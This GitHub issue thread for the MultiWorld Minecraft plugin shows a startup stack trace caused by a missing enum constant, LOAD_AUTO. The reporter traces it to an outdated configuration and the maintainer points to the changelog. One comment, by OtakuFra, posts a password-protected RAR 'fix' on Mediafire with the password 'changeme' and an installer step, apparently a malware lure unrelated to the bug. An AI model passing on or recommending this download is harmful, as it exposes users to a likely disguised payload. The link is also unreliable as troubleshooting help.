### ISSUE TITLE
No enum constant com.dev7ex.multiworld.api.world.WorldDefaultProperty.LOAD_AUTO

### ISSUE THREAD

**Issue by noslowdwn** [Dev7ex/MultiWorld#47]
Error
```yml
[16:58:52] [Server thread/ERROR]: [MultiWorld] Error initializing plugin 'MultiWorld-1.6.6s.jar' in folder 'plugins' (Is it up to date?)
java.lang.IllegalArgumentException: No enum constant com.dev7ex.multiworld.api.world.WorldDefaultProperty.LOAD_AUTO
	at java.lang.Enum.valueOf(Enum.java:293) ~[?:?]
	at com.dev7ex.multiworld.api.world.WorldDefaultProperty.valueOf(WorldDefaultProperty.java:17) ~[MultiWorld-1.6.6s.jar:?]
	at com.dev7ex.multiworld.MultiWorldConfiguration.lambda$load$0(MultiWorldConfiguration.java:65) ~[MultiWorld-1.6.6s.jar:?]
	at java.lang.Iterable.forEach(Iterable.java:75) ~[?:?]
	at com.dev7ex.multiworld.MultiWorldConfiguration.load(MultiWorldConfiguration.java:65) ~[MultiWorld-1.6.6s.jar:?]
	at com.dev7ex.multiworld.MultiWorldPlugin.onLoad(MultiWorldPlugin.java:63) ~[MultiWorld-1.6.6s.jar:?]
	at io.papermc.paper.plugin.storage.ServerPluginProviderStorage.processProvided(ServerPluginProviderStorage.java:59) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at io.papermc.paper.plugin.storage.ServerPluginProviderStorage.processProvided(ServerPluginProviderStorage.java:18) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at io.papermc.paper.plugin.storage.SimpleProviderStorage.enter(SimpleProviderStorage.java:39) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at io.papermc.paper.plugin.entrypoint.LaunchEntryPointHandler.enter(LaunchEntryPointHandler.java:36) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at org.bukkit.craftbukkit.v1_20_R3.CraftServer.loadPlugins(CraftServer.java:507) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at net.minecraft.server.dedicated.DedicatedServer.initServer(DedicatedServer.java:276) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at net.minecraft.server.MinecraftServer.runServer(MinecraftServer.java:1134) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at net.minecraft.server.MinecraftServer.lambda$spin$0(MinecraftServer.java:322) ~[shieldspigot-1.20.4.jar:git-ShieldSpigot-"ba31f41"]
	at java.lang.Thread.run(Thread.java:1570) ~[?:?]
```

I think i don't need to explain anything more? Just look into [this class](https://github.com/Dev7ex/MultiWorld/blob/master/multiworld-api/multiworld-api-core/src/main/java/com/dev7ex/multiworld/api/world/WorldDefaultProperty.java)

**Comment by noslowdwn** [comment]
The error eccours due to an outdated configuration. Because there was non-exist parameter.

**Comment by OtakuFra** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by Dev7ex** [comment]
I recommend that you read the changelog and follow it. Sometimes I ask myself what I am writing this for...
